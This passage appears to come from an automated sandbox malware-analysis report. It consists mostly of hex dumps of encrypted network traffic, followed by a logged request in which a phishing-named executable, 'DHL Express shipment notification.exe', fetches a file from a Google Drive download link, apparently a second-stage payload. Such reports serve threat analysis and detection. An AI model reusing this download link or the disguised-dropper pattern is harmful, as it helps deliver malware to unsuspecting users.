bd bb 87 69 a0 8c 55 02 cd 51 2d 38 5d 89 5b 5e 82 85 ac 73 10 a1 f0 9f c0 f0 c7 8d ee 8e 4d 50 6e 98 00 a3 44 d4 1d 64 14 18 f4 2c 84 0e 1d b9 74 00 72 5b Data Ascii: 3n-q!K^4;l?8)l0c)iql.N='tn&tvX9H\VZ{%Qr?X`}49FZI\|&x1\|SUd4vlM?F<4uII$Z,Hc`JcSYVf<T$eT1iUQ-8][^sMPnDd,tr[
2021-12-01 18:25:38 UTC	136	IN	Data Raw: 8c f4 fe e9 ec 5b cb 92 0a 75 16 2b 60 56 aa fe 15 0d c9 cf 97 a5 11 f3 f3 c0 4b 10 6f df 39 7d 1b 7b 69 4a c1 3c 99 87 5d ec cf 86 8e fb 3e ac c4 d4 88 22 9b cf e3 f3 f3 46 f0 a8 8a 21 c4 ab b4 7c e5 f6 70 bf f3 34 06 63 98 ed eb c0 30 00 36 81 8c 02 04 d5 c0 2c ed 57 0d 43 f4 40 4f d7 90 2f 9a 63 0f f0 52 bd 38 75 c5 67 c7 b5 d2 4d b5 bb 45 e9 a7 76 8e 84 e9 16 dc 57 9f 65 03 e1 6d c1 4d 1f 88 92 5b fd f8 a3 8a 84 8d 2b 9c 5f 6e e2 39 a8 cd 94 f0 52 e5 07 45 50 54 b5 fc 1e 9d 4c cb d1 b4 19 5f 87 15 72 71 56 17 13 a4 00 c9 6f 5e fe 5b b0 a9 d1 63 17 6b 5e 82 fb 79 2c b6 93 ae de 51 e4 28 e2 85 9d 3f 9c 6d 25 1b 79 aa 62 5f e5 79 2b 0b 2c e4 08 42 aa 45 9e 7f 2c 12 ed 34 81 bf d2 d2 a8 03 65 6c 1a 3e 41 f2 88 b9 66 4b 38 1e d8 f3 40 7b 3e 3e 1e 34 cf 96 Data Ascii: [u+`VKo9}{iJ<]>"F!\|p4c06,WC@O/cR8ugMEvWemM[+_n9REPTL_rqVo^[ck^y,Q(?m%yb_y+,BE,4el>AfK8@{>>4
2021-12-01 18:25:38 UTC	138	IN	Data Raw: 38 39 56 9d 58 f6 6c 1d c0 01 30 e9 bc 13 66 72 cb 75 ec 9c d7 49 1a 8d ef af 60 8a 16 66 19 04 99 35 e5 1b 83 5d 17 83 b3 c3 5d 14 c3 5a 13 b8 b1 52 bd 8c 95 d7 70 01 9a c0 a5 7e 33 f8 7c 1d e7 53 e9 b6 5d 40 3e be ef cf 2b 6d 51 57 b3 8d ab 33 64 04 a4 36 79 5a fe cb 4e 98 a0 ed 18 6a 7f 57 65 d5 79 6a de 43 14 0b 4c 52 72 11 45 77 4d ba 04 0c 6c 25 bf 8d a6 68 95 9d 6c 3f df 3c 04 34 4f 93 14 5c 9f be af 6e 06 ea f7 9f c4 f0 c6 86 c8 8f 5c 6c 1b 82 2d a8 5f ca 79 3d 18 07 f5 0c a5 3c 0c 98 4a 1f 73 57 fb 60 0b d5 9d a4 7f f7 84 b0 45 84 ae 20 86 2d 65 b5 3d 3f 5a 5d 54 b2 61 55 fb b0 6a 81 af 08 29 a4 8e 0e a5 a5 f4 29 c6 b7 60 25 94 80 46 d6 79 2a 59 0b ea 2d 4d cc 00 21 45 a8 8d c8 fd 0d 95 5c d8 d2 87 06 fa 40 59 b7 e2 a3 d0 01 c7 c7 8c f3 01 1d d6 Data Ascii: 89VXl0fruI`f5]]ZRp~3\|S]@>+mQW3d6yZNjWeyjCLRrEwMl%hl?<4O\n\l-_y=<JsW`E -e=?Z]TaUj))`%Fy*Y-M!E\@Y
2021-12-01 18:25:38 UTC	139	IN	Data Raw: fb c0 24 f5 5f 2f 52 ae 7e 47 ca a9 01 92 60 03 fb 31 af 59 6e cd 41 dd 80 f4 40 a0 a7 44 99 b1 6d 85 a1 e1 13 96 5f 80 0c 1b c9 70 cf 45 15 c2 e5 57 e6 f4 83 bc 9c b7 36 89 2d 7c fb 36 b7 c5 b8 bb 5e ec 0b 58 13 4f bb f9 1e d2 54 d2 ef a9 33 59 87 74 71 7d 7b 12 0b ae 45 be 79 41 f5 79 a8 b9 a8 7c 13 76 54 c1 89 34 08 c2 f6 ed b6 24 8a 43 e2 e8 f0 f6 b6 29 40 48 3a cf 0c 33 a0 0e 42 65 41 89 6c 6c c7 28 f7 f0 2d 77 9e 57 c4 d1 b6 d2 c5 6e 0c 03 5c 52 34 81 e0 b9 11 22 56 73 b5 97 6e 16 53 eb 34 72 a3 e3 93 13 cd 9e 35 10 ba ca 0c c9 5f f3 16 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 da e5 28 0f cd b4 6e 4d 2d 32 cd e6 48 b6 ce 6e c4 37 2a d6 f2 50 d7 b0 89 ca 12 84 46 c4 cc a7 76 5a 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 e0 a5 f6 e8 df 1a 12 ee 4c 33 Data Ascii: $_/R~G`1YnA@Dm_pEW6-\|6^XOT3Ytq}{EyAy\|vT4$C)@H:3BeAll(-wWn\R4"VsnS4r5_]y$+s(nM-2Hn7*PFvZb6ZjFL3
2021-12-01 18:25:38 UTC	140	IN	Data Raw: 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 59 14 e7 7c 88 5b 28 85 6a 6c 20 db 01 56 9a 68 2d 2b b9 a4 e2 4f 94 0f 69 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee 15 37 63 43 3e 93 50 69 1a da 82 57 a4 20 61 07 6e e1 78 41 a2 83 01 05 43 91 e0 41 b1 5c 01 41 41 ce 4b 5b 26 6a 6a b1 96 1c 4d 14 1f 56 a3 a0 74 f8 57 34 90 29 79 c8 f9 54 19 25 97 a0 Data Ascii: A, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Y\|[(jl Vh-+Oih/jBn37$Z=u7cC>PiW anxACA\AAK[&jjMVtW4)yT%
2021-12-01 18:25:38 UTC	141	IN	Data Raw: 47 7d 17 46 ca 7b a1 19 37 90 b6 22 d8 ff 2e 7a 12 b4 01 fc 10 c0 8f 0a 05 e6 db 75 bc 69 18 1b 54 78 da 16 97 0f df 2c 3b f5 8b 82 11 5f 04 29 80 97 a5 b2 b8 38 24 cd 04 8e d0 e5 81 96 38 f3 16 40 72 34 91 b6 46 04 36 76 73 a5 c4 91 03 73 77 71 62 6f e3 93 13 cd 30 70 10 ba ca 0c c9 5f 3f 53 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 82 a0 28 0f cd b4 6e 4d 55 77 cd e6 48 b6 ce 6e a2 72 2a d6 f2 50 d7 b0 1d 8f 12 84 46 c4 cc a7 f0 1f 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 42 9c 23 50 04 1b 37 57 49 69 ce 17 55 c3 d2 e1 3f 8a df c6 03 7f d7 72 db 26 f1 d7 9a 44 f1 6c 34 46 f6 c9 c3 1b 14 3f e9 f1 ef 5e 03 49 f0 94 18 a6 48 4e 3e 86 48 3b 7e 47 c5 5c cb f4 01 b6 5b 51 66 19 44 2c c2 6d e5 29 a4 a8 07 f0 a5 15 30 be 6c b2 9d 56 19 d0 a4 Data Ascii: G}F{7".zuiTx,;_)8$8@r4F6vsswqbo0p_?S]y$+s(nMUwHnr*PFb6ZjFnB#P7WIiU?r&Dl4F?^IHN>H;~G\[QfD,m)0lV
2021-12-01 18:25:38 UTC	143	IN	Data Raw: 8f 27 26 bb 9d 84 54 99 e9 a7 63 aa d9 e1 b2 48 2c 15 38 5a 2e f0 79 c1 08 0d d1 df 04 d6 9b 69 5f d3 ef 60 e8 f1 af 5a a7 84 2d 25 e3 90 00 bb 14 e8 5f 7c 8b 82 00 85 6e 9a 08 db fe a6 b3 68 95 01 90 a4 e2 08 bd 0f 29 b6 a5 a3 a7 e7 80 aa e1 3b 06 6a b7 93 f6 98 bc 98 1a 37 24 c4 b1 b9 5a f9 b3 ab a0 60 da a4 75 d7 9f ee cd 90 49 43 30 40 c0 67 1a 9f a1 9a 85 8c 4b 4b a3 ef 07 29 cb be 0a 75 31 8b ac 33 d0 91 0a 22 20 63 0e 34 52 a0 23 d4 b6 7f 14 7a 3f 09 e1 80 30 e4 28 14 fd ce 31 ad d7 ea 38 2f b3 7a 1e 4f f4 8c 35 56 96 a4 08 af ee 93 81 cd e1 11 c4 29 1a 24 58 44 93 b4 3b 6b cc 26 8e 71 a2 25 ba 58 42 ec 53 77 ed 37 bb aa 9e eb 84 e6 6f 8f 55 46 34 14 f6 95 46 2e 81 a1 f6 a0 3e 84 9a 20 09 7d 0b 44 7b 10 4f ce 35 21 92 aa d1 e9 3c aa ff eb e3 f6 6f Data Ascii: '&TcH,8Z.yi_`Z-%_\|nh);j7$Z`uIC0@gKK)u13" c4R#z?0(18/zO5V)$XD;k&q%XBSw7oUF4F.> }D{O5!<o
2021-12-01 18:25:38 UTC	144	IN	Data Raw: d4 76 b9 74 02 79 cc af 7e 84 30 5b 26 d3 f8 15 18 d6 40 a5 60 2b d1 87 16 a9 86 f0 c9 5e 6a bf b4 19 24 3b 1a a0 82 66 f9 be 0b cc 36 58 bf 84 35 a5 b0 52 fd 76 ed 28 a5 a0 95 f0 68 0b d0 a5 5b 3e ec 25 76 61 62 b5 a1 2a 97 b7 f4 df f1 cf 3d 2d e9 4d 34 04 6c 5e 39 24 04 aa 39 05 af b3 98 6c e5 aa a8 67 7f 87 1e ba 5f a2 b8 ef 2a 95 2d 34 31 9f a7 ae 76 70 11 b9 9d 8e 27 50 26 85 fa 7c e7 48 1e 52 e7 31 68 11 32 ab 38 9c f4 76 df 35 3c 0b 7d 6a 7c ae 0c 9c 7a cb dd 69 94 f2 15 63 db 02 d6 d9 24 70 a6 c1 ab 06 45 d5 23 97 ee 2b 5e a9 09 9f b8 b7 ed 3b 4f 10 b4 e5 de 30 78 ad 13 5d d6 82 a3 27 df ad 40 e6 34 7a d0 85 0d 3b 61 8a 43 d6 09 12 dd 2e 5d f3 b1 53 5c 50 f8 1a eb 8d e4 54 3a 97 a8 ab 61 b7 23 71 02 32 a8 26 de 0e b2 2e 21 e2 b2 cf 7a 17 e9 5b 49 Data Ascii: vty~0[&@`+^j$;f6X5Rv(h[>%vab=-M4l^9$9lg_-41vp'P&\|HR1h28v5<}j\|zic$pE#+^;O0x]'@4z;aC.]S\PT:a#q2&.!z[I
2021-12-01 18:25:38 UTC	145	IN	Data Raw: 2b 98 fd c8 2b 41 45 4b af c8 cd 28 aa f7 cc f7 3d 87 cd 1b c4 d8 8a e3 5a 00 2a 77 e9 9e 22 68 1c e4 e8 d6 ec 12 22 cd a7 7b 29 a6 93 48 32 54 8a de 5a b5 5d 45 72 52 cf 46 34 25 23 66 b9 db 0a 16 17 5c 56 8a e5 44 ee 6d 71 91 22 4d df b8 3a 14 42 d0 c9 7e 20 95 f3 5b 39 fb 95 44 c1 8a 42 c9 be 8e c8 9b 4a 7f fd 02 2d fd df 78 0f e2 66 c3 18 ee 28 f5 3c 01 0a 10 1a 8c e9 f1 f8 fb 4d c5 93 1d 16 1e 46 59 54 b0 c6 23 0a ca e2 99 a4 7c e5 f4 ca 67 7d 7c 98 3a 7d 22 7e 34 4c f1 3c ad 8c 52 e4 8c 84 8e c2 3e b1 cb cc e1 2a 94 c2 b0 e1 f4 4c de aa 83 62 c8 a8 84 4a 96 ea 40 b8 fb 35 06 4d 98 e3 eb fc 14 0a 24 a3 8d 0c 0c b4 d9 21 d4 3a 0d 44 b3 7e 47 d0 9b 3d 8a 67 07 f0 56 99 38 6f c1 60 c5 99 c5 00 bd b6 48 ba b5 71 84 ba f0 00 9b 54 95 4d 6c cd 7d cb 7b 14 Data Ascii: ++AEK(=Zw"h"{)H2TZ]ErRF4%#f\VDmq"M:B~ [9DBJ-xf(<MFYT#\|g}\|:}"~4L<R>LbJ@5M$!:D~G=gV8o`HqTMl}{
2021-12-01 18:25:38 UTC	146	IN	Data Raw: 03 82 0d e3 44 d0 1d 23 30 1f d7 20 bf 35 1c 81 5e 15 76 4d 8f 64 0d df f4 9a 78 d4 8c ae 52 cb be 24 f0 3f 45 b5 17 37 4a 23 56 a8 6c 48 db b1 49 e4 ab 1a 3e a6 a2 60 85 a9 e3 33 ee be 4a 55 86 87 28 cc 7d 20 1a 11 ef 75 45 ec 0a 05 69 b5 b1 d9 ff 06 95 46 d0 c0 8b 06 fa 5f 5b b7 fc c2 d5 0d e1 cf 80 f3 4a 18 b7 35 b6 f6 d1 03 57 19 49 b4 ff d0 13 ad c9 d9 c5 4d 91 d6 10 e1 d0 8f a9 52 11 43 5d e5 8e 0e 53 00 d9 ff f6 fd 14 4b d4 a9 42 44 a6 94 0f 18 58 9a ee 7a be 63 44 51 45 d4 25 59 3b 2e 61 9d d8 3d 4c 1b 4d 4b cd f7 59 d9 69 79 99 68 70 c4 b3 30 5d 41 e0 d4 53 3d 80 97 75 3f f2 91 6c c1 bd 64 c3 bd e1 ca 80 47 77 90 11 6a fe db 71 02 85 65 f3 05 cd 37 94 35 2b 01 14 3e 83 d2 fb da ec 5b da 87 1d 10 33 23 55 53 bc e7 46 13 c7 cf 9b a4 75 aa f7 c7 42 Data Ascii: D#0 5^vMdxR$?E7J#VlHI>`3JU(} uEiF_[J5WIMRC]SKBDXzcDQE%Y;.a=LMKYiyhp0]AS=u?ldGwjqe75+>[3#USFuB
2021-12-01 18:25:38 UTC	147	IN	Data Raw: 28 20 51 e0 8d eb 74 51 22 12 c7 e3 6e 7b 3a 33 18 21 d7 91 f6 72 a0 63 04 7f ca ca 7b a0 31 52 3e db b3 30 10 dc 4d 9a 71 59 fb 96 1e 94 b6 ed d0 28 62 a4 cc 0b 3f 16 1b a2 95 2d b6 b9 07 cc 1f 47 b2 dc 3d be c8 78 fd 51 e8 29 b7 a9 a7 9d 76 1a db ba 71 3f b6 29 6b 6b 7f a9 af 2a e1 d2 d0 d2 f9 da 1d 03 9c 54 39 6a 76 5a 33 67 04 a7 6f 30 b1 95 84 4b c9 b0 a8 77 0d b8 1e 9f 43 85 b6 f3 28 82 2d 34 2b 9f b1 a6 69 53 5a 9d b2 80 30 77 3b 9f f8 5c c3 3c 2f 57 ea 3b 6c 7e 30 ac 32 a6 99 65 98 36 38 1e 7c 36 6b a7 19 a6 46 ca dc 75 9f c9 51 55 ca 0d db f1 25 4e d0 c9 b0 33 45 d4 17 93 fd 0a 3b a8 23 90 a5 a9 c8 15 6b 1c b4 ec f7 26 3f b6 1f 57 fe 95 97 31 ca 8e 40 90 20 54 f7 b7 3c 4b 49 9b 52 c7 7b 22 d1 34 74 fb a3 3e 6a 6f dc 0c 9b 8a c8 42 3e 8e cc e4 79 Data Ascii: ( QtQ"n{:3!rc{1R>0MqY(b?-G=xQ)vq?)kk*T9jvZ3go0KwC(-4+iSZ0w;\</W;l~02e68\|6kFuQU%N3E;#k&?W1@ T<KIR{"4t>joB>y
2021-12-01 18:25:38 UTC	148	IN	Data Raw: 46 d4 cd 8d 1c f1 6a 42 d2 e1 ce ce 07 fa cf 8f f3 62 0f c4 31 be ff d9 6e 44 5e 4a b0 f6 dd 74 ae f4 c2 cf 6e 95 ca 11 e4 d0 9d be 56 04 26 30 e1 87 0e 75 3d ee ee c7 ed 06 2d c6 b2 2c 5e a2 9e 4c 18 55 d0 ea 5e b9 5e 72 47 54 e2 50 52 34 2f 7a d4 db 03 51 15 6c 5a b9 c9 5e d1 6b 14 8a 2f 73 c0 ba 3d 3a 42 de c9 5d 1c 91 e3 51 38 f0 97 25 c2 83 79 c3 9e 95 cf 80 47 7d a9 1a 02 dc e7 47 28 8f 4a a0 06 cb 29 f9 35 26 4b 10 1a 84 e8 c6 de ec 57 c4 81 3b 1a 3d 09 61 65 9a d6 07 64 c3 cc 9f a6 42 f0 e8 c7 48 1a 5f 9e 12 5f 1a 48 59 62 c5 55 89 80 52 ed a2 8f cd c2 32 b6 c0 de 95 35 9e c5 84 d0 f5 6e d2 90 bc 4c ea 91 e0 70 fb f4 46 81 e4 31 16 06 f5 f7 eb c1 1c 09 24 ce 8f 0c 08 ba e0 37 ea 4e 05 27 b7 40 51 c7 8c 1a 9b 78 29 fb 45 8e 5d 6a db 67 c7 9a a1 59 Data Ascii: FjBb1nD^JtnV&0u=-,^LU^^rGTPR4/zQlZ^k/s=:B]Q8%yG}G(J)5&KW;=aedBH__HYbUR25nLpF1$7N'@Qx)E]jgY
2021-12-01 18:25:38 UTC	150	IN	Data Raw: 2e 86 0f 72 46 6a ab b3 07 a5 c0 cd dd fd db 0a 6c eb 42 26 61 54 42 23 0e 0c ba 53 30 b5 91 80 4f f9 9e c6 74 1e a1 17 94 53 85 90 ff 30 b5 09 42 05 97 b9 b0 4c 14 48 80 9f 82 33 67 67 87 f5 6e c3 07 3b 4a c1 2d 4f 3a 22 b3 1f aa 84 72 e1 5b 26 07 6f 21 63 b7 19 a2 4c d0 ed 75 82 ca 67 64 db 14 c6 dc 56 6e b9 ca b4 26 44 88 27 97 ff 2b 11 ab 14 b6 b0 ae cc 67 6e 1a a8 d5 ff 3a 65 9a 76 58 fa 91 b5 1b cb be 62 83 17 70 f5 b6 12 39 70 97 52 d6 5e 65 c3 29 5e f3 b8 19 25 68 ce 2d fe b2 d4 58 14 86 dc 8f 66 bd 0b 66 22 13 b5 24 ca 6f b5 3c 16 87 8a d3 60 3d e1 4b 2e b9 c3 57 bb 90 ac df 6c 5b ba a1 a4 72 12 e0 65 3e ac 50 c1 84 38 7e 31 8f ef f4 1b 6b 64 5d b5 97 bb 26 54 36 d2 32 18 5b f2 ec 4d b2 a1 b7 26 4f 09 45 43 ce 60 40 df 19 2d 1f 57 73 5e 09 71 12 Data Ascii: .rFjlB&aTB#S0OtS0BLH3ggn;J-O:"r[&o!cLugdVn&D'+gn:evXbp9pR^e)^%h-Xff"$o<`=K.Wl[re>P8~1kd]&T62[M&OEC`@-Ws^q
2021-12-01 18:25:38 UTC	151	IN	Data Raw: 38 7a 3f 3f cd 80 30 b7 04 14 fd 46 1d ad d7 59 14 2f b3 a0 32 4f f4 97 18 56 96 f8 25 af ee 10 ac cd e1 bd e9 29 1a fd 75 44 93 b2 15 6b cc 0b a0 71 a2 47 94 58 42 65 7d 77 ed 87 95 aa 9e 3e aa e6 6f 75 7b 46 34 37 d9 95 46 64 ae a1 f6 c9 11 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f df af 8d e1 47 f7 ab e3 84 9a 28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af 71 64 40 e0 e2 61 61 d5 b7 45 83 3a 60 27 da 2d 22 be ff 6e fe 15 6e 9e 31 d8 38 18 a8 0e a8 f4 a1 2e d0 d5 21 e9 d0 1f e0 e9 84 72 f2 3a f2 0c 6c a0 1e a2 28 71 ec 92 36 90 91 cc c9 e8 e2 58 f9 5f 19 8b 57 c5 a0 f0 de 3f 88 6e 2a 13 38 da 8f 7b 9d 21 a6 b8 db 5a 2d e2 74 06 14 15 6f 66 ca 4f c9 18 37 8a 06 f9 fd cc 3e 3f 32 7c f1 d1 2c 2d f2 63 dd 16 14 Data Ascii: 8z??0FY/2OV%)uDkqGXBe}w>ou{F47Fd&}TO!U<_G()Xbcqd@aaE:`'-"nn18.!r:l(q6X_W?n*8{!Z-tofO7>?2\|,-c
2021-12-01 18:25:38 UTC	152	IN	Data Raw: 44 c2 6d e5 a9 f7 21 42 58 5a c2 5a be e5 f7 71 06 e6 06 2f 84 43 ab 5e d9 8b 39 24 5a b6 60 c1 d5 da de 7f 1c 8a 09 0a 6a c7 e7 af 98 45 9b 6a 95 fc ee 9d ae 9b 8f 63 d0 3b 28 f7 73 0d 7f 52 89 5b f9 cb 6d 26 a1 71 61 1f 22 1e 63 ad f1 46 53 1c fd 0a d2 8a 6f 14 1e 96 e3 50 9d 90 97 f9 53 22 48 db 9c d1 ee 7b 0d fd 68 8b 79 73 44 f6 f7 8a 32 90 3a 43 a0 6a ee fa 0d 28 77 b5 98 63 50 91 75 44 71 1f dc 6d 5d 50 8b f7 95 93 d1 0e 95 69 13 d2 ad 5a 81 66 ae d1 2f 13 cc eb 44 57 ea 3d 33 3a 69 c8 6e 8b 87 d2 36 76 ef 0c 1b 44 99 b8 85 04 82 a8 70 71 aa 51 00 02 b0 a5 ac d4 a3 64 49 fb 08 c4 03 01 4d e1 8a 65 ca 52 c3 7c e3 aa 95 9d 79 d3 79 b5 2c b1 79 c1 cb 7b 69 6f 7f 9c 00 b3 c2 e5 35 eb 62 86 8e 18 94 31 22 ab d9 41 84 27 a1 9e f2 0a a3 88 7f 3e f7 de c2 Data Ascii: Dm!BXZZq/C^9$Z`jEjc;(sR[m&qa"cFSoPS"H{hysD2:Cj(wcPuDqm]PiZf/DW=3:in6vDpqQdIMeR\|yy,y{io5b1"A'>
2021-12-01 18:25:38 UTC	154	IN	Data Raw: 46 28 ca 10 2b 11 21 72 1a e6 6e 85 d2 bb bb 41 d0 79 94 fe e4 02 b6 55 7c 0e 90 e8 b8 d5 14 fe f9 6b 33 25 fa 35 21 71 a1 18 eb a9 65 32 5e 5d bd 38 92 b0 59 8d dd 36 5c 8f e8 42 78 86 04 6c 19 c2 13 3d 80 d4 50 cc 2b d9 a0 e3 e6 1f 27 86 31 9d cb 9f 11 6c ea e2 d6 01 20 3a d6 84 32 f2 3a ae 0c 6c a0 00 92 0d 41 c0 a2 03 a0 17 fc 65 d8 e1 69 ec 6e 3b ba 9c f4 bb c2 0c 0d 95 5d 2b 27 1f ee 70 4f b1 14 4b 8d c1 6c db d4 48 31 79 2d e5 5e 04 53 1d 20 df a8 cd e5 95 c6 51 43 51 0b 49 b3 f5 77 91 cd 22 8d c5 b1 03 de 87 cc ce cf 9e 7c a8 26 7e 32 d3 da 0e 12 65 41 25 6c 6c c7 23 c7 46 59 00 af c3 d5 60 87 1c f4 69 3e 3f 6e 04 06 f2 d2 05 23 fb 64 85 87 84 5d 39 60 3d 42 f5 90 47 a0 da fe 2b 44 32 8e 82 38 86 6b 56 67 39 a9 93 4d 53 10 c1 30 0e ab 8f 46 56 f7 Data Ascii: F(+!rnAyU\|k3%5!qe2^]8Y6\Bxl=P+'1l :2:lAein;]+'pOKlH1y-^S QCQIw"\|&~2eA%ll#FY`i>?n#d]9`=BG+D28kVg9MS0FV
2021-12-01 18:25:38 UTC	155	IN	Data Raw: f3 b9 28 99 4a c8 6d 86 52 84 60 f0 df d6 98 08 44 a5 01 5d c3 90 1e be c0 44 8c 96 4b 7a fe 02 29 b2 ab 1b 46 84 1b ee ff a7 36 50 f9 8a 0b 6e 1f d7 38 c1 d9 c9 7b 07 63 8e 71 58 1c c8 b2 46 ef bc a9 dd 1e e0 10 b2 8b 06 36 2f 5c ba 5b 7d 04 5e 4c 69 21 4f c0 cc 3f b3 77 0d db 0f 35 2e cb 12 44 c6 64 c2 64 be d5 b4 1e 4f e5 10 36 89 f1 84 c8 af a3 b9 de c0 dc 58 14 e7 d9 a4 fb cf 8f 5a 7d d7 46 2e 72 1a 4c 8e db e0 47 0d 06 af 31 57 83 db eb 73 a1 5d e5 9a 92 10 79 12 70 da e3 85 62 26 34 17 f8 5f 18 f6 e6 95 b8 44 50 fe f8 6b 59 5f f9 3b 63 60 e9 d7 1c 34 d0 ca 82 fa 77 84 45 75 62 21 bf 60 56 39 e1 db 93 b0 52 a0 11 f9 9e a7 75 c4 35 72 e8 ec 99 cc 52 df 90 9a ad a7 50 38 78 49 a2 1d 54 9f 0d 95 e7 27 83 9d f9 55 91 77 07 12 9e 92 93 47 d4 30 0d 61 78 Data Ascii: (JmR`D]DKz)F6Pn8{cqXF6/\[}^Li!O?w5.DddO6XZ}F.rLG1Ws]ypb&4_DPkY_;c`4wEub!`V9Ru5rRP8xIT'UwG0ax
2021-12-01 18:25:38 UTC	156	IN	Data Raw: e6 08 17 00 e6 1f d7 a5 b3 11 c5 9d c5 00 54 ef 26 d4 10 ee d4 43 0e 6a a9 db f0 ae db 29 c0 de 20 02 6e 06 99 07 e7 38 b2 7e 10 04 02 9c b5 2d a7 7e 9c de e1 b9 17 ea 4f 14 2f 35 44 03 f1 1d f2 b3 0c 5b 0d 02 f6 14 35 4a 3e 77 fd e1 20 cd fe 4b d1 50 18 87 7e a4 d5 bd 6b ae 14 25 55 71 f2 86 06 45 33 fe 58 87 b4 83 51 c7 16 90 2e 39 48 f5 68 9f ee 32 ed 4e 51 0c 13 5d 52 44 81 e0 b9 3e 13 60 42 e1 a6 07 27 2e 66 e9 43 61 d2 60 22 33 01 6d 22 8d f8 74 fb de 0d fe 8d 25 6f 98 8a 2e fa 2d 18 a8 c4 f9 f4 5e b1 60 1b 3c f9 c1 5a 5a 60 f6 f8 4e 7d 6e fb 3c 94 0d 1c 43 c4 f4 e1 79 2b 56 24 83 71 a6 fb cd c7 6d 55 c3 ff bf 6d 56 5d ad 32 ba ec 01 71 a7 8b e5 8f 68 8a 60 7f be 1e 66 39 d8 09 48 76 69 ee 16 55 0f d2 e1 3f dd ef b4 33 f8 e7 e3 eb b8 c1 19 aa 71 c0 Data Ascii: T&Cj) n8~-~O/5D[5J>w KP~k%UqE3XQ.9Hh2NQ]RD>`B'.fCa`"3m"t%o.-^`<ZZ`N}n<Cy+V$qmUmV]2qh`f9HviU?3q
2021-12-01 18:25:38 UTC	157	IN	Data Raw: 0e db 77 20 2c 74 fe dc d8 3e e5 c4 2f 31 9d 15 77 19 0e ac 23 7b c1 84 f5 5b 55 98 b7 9e 85 f1 b8 80 b8 86 1f 52 59 9b 5e b5 1e c5 4e ca 4e f5 a7 cd fc f7 5e 7c 2d e4 37 a6 b8 95 53 1b aa 77 21 31 de 71 16 1a ee f5 c7 f0 1b 67 4d 9a 19 c9 0c 09 3f ed a5 0f 33 55 ef b1 68 1d f0 80 df 24 b0 b2 90 3c 32 d5 d4 1d 1f 43 23 b2 40 7c b3 5f 10 8d 56 60 18 cb c6 bd a2 70 ad 37 81 84 da 6b ac 27 11 fe b4 93 9f 5c 91 92 d9 ab 17 2a 8f 06 e7 d0 84 22 0b 67 1c 89 a3 e1 62 9f a1 cb 98 59 c8 cc 4d c5 8d 9e f5 43 5b 3b 08 f0 d2 e7 22 ea b3 9a 15 99 60 5f a3 c0 2c 5d f0 88 1a 09 0a 6a bc ab eb ad 1a 22 80 a1 25 08 52 4a 08 d8 81 7e 0f 12 08 53 fa f0 07 c3 33 6c ca ea 2a 1d e0 b9 23 cb 84 b0 0a 5b cc bf 20 7a ae c8 1d 9b d6 b8 94 61 d9 0d d1 9d 22 45 4d f8 ab 72 2d af f4 Data Ascii: w ,t>/1w#{[URY^NN^\|-7Sw!1qgM?3Uh$<2C#@\|_V`p7k'\"gbYMC[;"`_,]j"%RJ~S3l#[ za"EMr-

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49764	142.250.185.206	443	C:\Users\user\Desktop\DHL Express shipment notification.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 18:26:21 UTC	158	OUT	GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache Cookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
2021-12-01 18:26:21 UTC	159	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 01 Dec 2021 18:26:21 GMT Location: https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Content-Security-Policy: script-src 'nonce-LyndeTQrDe/SVjdJSxgo6g' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Sec-Fetch-Dest, 